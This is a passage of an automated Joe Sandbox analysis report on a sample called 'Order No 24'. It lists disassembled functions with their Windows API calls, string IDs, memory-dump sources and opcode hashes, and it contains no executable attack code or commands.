                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 009E9968
                                                                                                                                  • GetSysColor.USER32(00000012), ref: 009E9982
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                  • Opcode ID: f7318725d3bf3ab9085141b182ea2e3b6f5e4dafea4a712dccf17551f485c091
                                                                                                                                  • Instruction ID: d121deab6dcc21004289d65d8789bec0d943943dfd995a7dc69ef0bb8273b543
                                                                                                                                  • Opcode Fuzzy Hash: f7318725d3bf3ab9085141b182ea2e3b6f5e4dafea4a712dccf17551f485c091
                                                                                                                                  • Instruction Fuzzy Hash: DA116772520209AFDB05DFF8CC45AEA7BA8FB48304F014A28F955E3251E735E851DB60
                                                                                                                                  Function 009E9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 009E9699
                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009E96A8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                                  • String ID: edit
                                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                                  • Opcode ID: b2bfdcfec53f2117261b9b6b690dac309505e745e11eac6d34783733608466bb
                                                                                                                                  • Instruction ID: 7143405c36960dac7e75f65741b7540be306925499daf0a984018ea2f529b488
                                                                                                                                  • Opcode Fuzzy Hash: b2bfdcfec53f2117261b9b6b690dac309505e745e11eac6d34783733608466bb
                                                                                                                                  • Instruction Fuzzy Hash: 0F11BC72100188ABEF128FA9DC80EEB3B6EEB457B8F100716F925971E0C736DC919760
                                                                                                                                  Function 009C5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009C52D5
                                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009C52F4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                  • Opcode ID: 9b2a877ae7e3177224ffb3406289324aba5e5d53ecc932cec026d8697432f308
                                                                                                                                  • Instruction ID: 12717a721e6cdf932634e1a965f8ac30d00582a20a8fb6fb473baee0d5f9db3e
                                                                                                                                  • Opcode Fuzzy Hash: 9b2a877ae7e3177224ffb3406289324aba5e5d53ecc932cec026d8697432f308
                                                                                                                                  • Instruction Fuzzy Hash: D2110336E00614EBDB10DA98C840F9D77ECAB86350F060019E812E7190D3B0BD81CB92
                                                                                                                                  Function 009D4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009D4DF5
                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009D4E1E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                  • String ID: <local>
                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                  • Opcode ID: 4dc0ee3b2f37021aaf56360915836baef455079c9c9f5a92ffbb544cd12996df
                                                                                                                                  • Instruction ID: 8731057b6890bfd28537abcecbbff4a36de92e5e617f177aac8fc402152f4d2f
                                                                                                                                  • Opcode Fuzzy Hash: 4dc0ee3b2f37021aaf56360915836baef455079c9c9f5a92ffbb544cd12996df
                                                                                                                                  • Instruction Fuzzy Hash: 21119A71581225BBDB258BA18889EEBFBADFB06794F10C62BF50596280D3706981C6F0
                                                                                                                                  Function 009DA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 009DA84E
                                                                                                                                  • htons.WSOCK32(00000000,?,00000000), ref: 009DA88B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htonsinet_addr
                                                                                                                                  • String ID: 255.255.255.255
                                                                                                                                  • API String ID: 3832099526-2422070025
                                                                                                                                  • Opcode ID: b5c7dceb8066e1c71f984529bb9977942890f02d6ae0a135b72b13c03a85403f
                                                                                                                                  • Instruction ID: fd4a273d6c8b46b6c93520ddff52aed17ce38869731d540d784be4b8b6e16cdf
                                                                                                                                  • Opcode Fuzzy Hash: b5c7dceb8066e1c71f984529bb9977942890f02d6ae0a135b72b13c03a85403f
                                                                                                                                  • Instruction Fuzzy Hash: B001D675640304ABCB11DFA4C856FA9B368EF44314F10882BF915973D1D771E812D752
                                                                                                                                  Function 009BB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009BB7EF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 3850602802-1403004172
                                                                                                                                  • Opcode ID: 0907bc11a31f7ca73299fa0c4702a09d95d295a4591c1655245480670145c1f7
                                                                                                                                  • Instruction ID: 09f3f347d836ed58154818a6fc86fc63458a84e7213978c2addf8ef667846987
                                                                                                                                  • Opcode Fuzzy Hash: 0907bc11a31f7ca73299fa0c4702a09d95d295a4591c1655245480670145c1f7
                                                                                                                                  • Instruction Fuzzy Hash: 7101D4B5641118ABCB04FBA4CD52AFE33ADBF85360B040A1DF462673D2EFB45908C7A0
                                                                                                                                  Function 009BB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 009BB6EB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 3850602802-1403004172
                                                                                                                                  • Opcode ID: 5a510ed2646f0ce2c69b02458f385af35814a6eaf6fb8ba802226aef9f7a6e56
                                                                                                                                  • Instruction ID: 885e0fb1ef1a48c4ce083ed8b4d8932c8120acd691fc5f4143d2d3a1c4faaa10
                                                                                                                                  • Opcode Fuzzy Hash: 5a510ed2646f0ce2c69b02458f385af35814a6eaf6fb8ba802226aef9f7a6e56
                                                                                                                                  • Instruction Fuzzy Hash: A10162B5A41108ABCB14FBA4CA53BFE73AD9F45354F10002DB502B32D2EBA45E1897B5
                                                                                                                                  Function 009BB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 009BB76C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 3850602802-1403004172
                                                                                                                                  • Opcode ID: 0bdc322aa504e5afe943d9fe1da5d38b453ce78739bdc410e2f35239e1b250c6
                                                                                                                                  • Instruction ID: 8beda26d8876d06cd25bf7d1f37209e99bd3dcf3d656a06b5305efcb8a8a8c74
                                                                                                                                  • Opcode Fuzzy Hash: 0bdc322aa504e5afe943d9fe1da5d38b453ce78739bdc410e2f35239e1b250c6
                                                                                                                                  • Instruction Fuzzy Hash: B30162B6641104BBCB14FBA4DA52BFE73AC9F45354F50001AB402B32D2EBA45E1987B5
                                                                                                                                  Function 009C7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                                  • String ID: #32770
                                                                                                                                  • API String ID: 2292705959-463685578
                                                                                                                                  • Opcode ID: 183c3f18c17589a445c93d8e6370416463c3c0bd566fab9c39bfb11d09e1f036
                                                                                                                                  • Instruction ID: 5ab20bb47da1383560c7692a7d005378437d70a2ff66d4eae86dac505e9ef962
                                                                                                                                  • Opcode Fuzzy Hash: 183c3f18c17589a445c93d8e6370416463c3c0bd566fab9c39bfb11d09e1f036
                                                                                                                                  • Instruction Fuzzy Hash: 0EE09277A042282BDB10EAE5DC0AF87FBACAB91764F00001AB905E7081D760A60287D4
                                                                                                                                  Function 009BA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009BA63F
                                                                                                                                    • Part of subcall function 009A13F1: _doexit.LIBCMT ref: 009A13FB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message_doexit
                                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                                  • API String ID: 1993061046-4017498283
                                                                                                                                  • Opcode ID: 1478c414ff3aca1389538eec495883b796df7ac8a20cf9f5688793f84a626c61
                                                                                                                                  • Instruction ID: a601cf1138cf05495354a901236fe116a817ae3e04cb9f6e20366c89c0cb76f5
                                                                                                                                  • Opcode Fuzzy Hash: 1478c414ff3aca1389538eec495883b796df7ac8a20cf9f5688793f84a626c61
                                                                                                                                  • Instruction Fuzzy Hash: D3D05B323C432877D61436DC7C17FD5764C9B55B61F054416BB08D95C24DD2958142D9
                                                                                                                                  Function 009FAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 009FACC0
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 009FAEBD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                                                                                  • String ID: WIN_XPe
                                                                                                                                  • API String ID: 510247158-3257408948
                                                                                                                                  • Opcode ID: 037c90c4d08a1837efb46421645e44f6d5d870b93d87c5ad6901ccfe96544600
                                                                                                                                  • Instruction ID: a4f3aa5fcf26bd500cbd09d97fcecb7f274e17c8c544080d54b83c0b72349f9e
                                                                                                                                  • Opcode Fuzzy Hash: 037c90c4d08a1837efb46421645e44f6d5d870b93d87c5ad6901ccfe96544600
                                                                                                                                  • Instruction Fuzzy Hash: 1DE065B5C0014DDFCB11DBE9D944AFCF7BCAB48300F108082E196B2160CB345A45DF21
                                                                                                                                  Function 009E8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009E86A2
                                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009E86B5
                                                                                                                                    • Part of subcall function 009C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                  • Opcode ID: 24191f869a45c2edc510e3d6735042827c04f04874ff4e5dbcdb8f9475498890
                                                                                                                                  • Instruction ID: 4beecda42c57ad4fd3529971aac125f65afcbdd04f3b4c4f97df618bc4a810a7
                                                                                                                                  • Opcode Fuzzy Hash: 24191f869a45c2edc510e3d6735042827c04f04874ff4e5dbcdb8f9475498890
                                                                                                                                  • Instruction Fuzzy Hash: EFD01233798318BBE768A7F09C4FFC67A18AF44B11F100819B749AA1D0C9E1E942CB54
                                                                                                                                  Function 009E86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009E86E2
                                                                                                                                  • PostMessageW.USER32(00000000), ref: 009E86E9
                                                                                                                                    • Part of subcall function 009C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                  • Opcode ID: a700d01a96f740e53bfa98cc601d97043d436147d35e52ae7720e0d31e2cae28
                                                                                                                                  • Instruction ID: eb8b54abff5f1af58370302c5dfa56da5d7cb4f31458227ab19213a80e9423f5
                                                                                                                                  • Opcode Fuzzy Hash: a700d01a96f740e53bfa98cc601d97043d436147d35e52ae7720e0d31e2cae28
                                                                                                                                  • Instruction Fuzzy Hash: AED0C9327853187BE668A7F09C4BFC66A18AB44B11F100819B645AA1D0C9A1A9428A55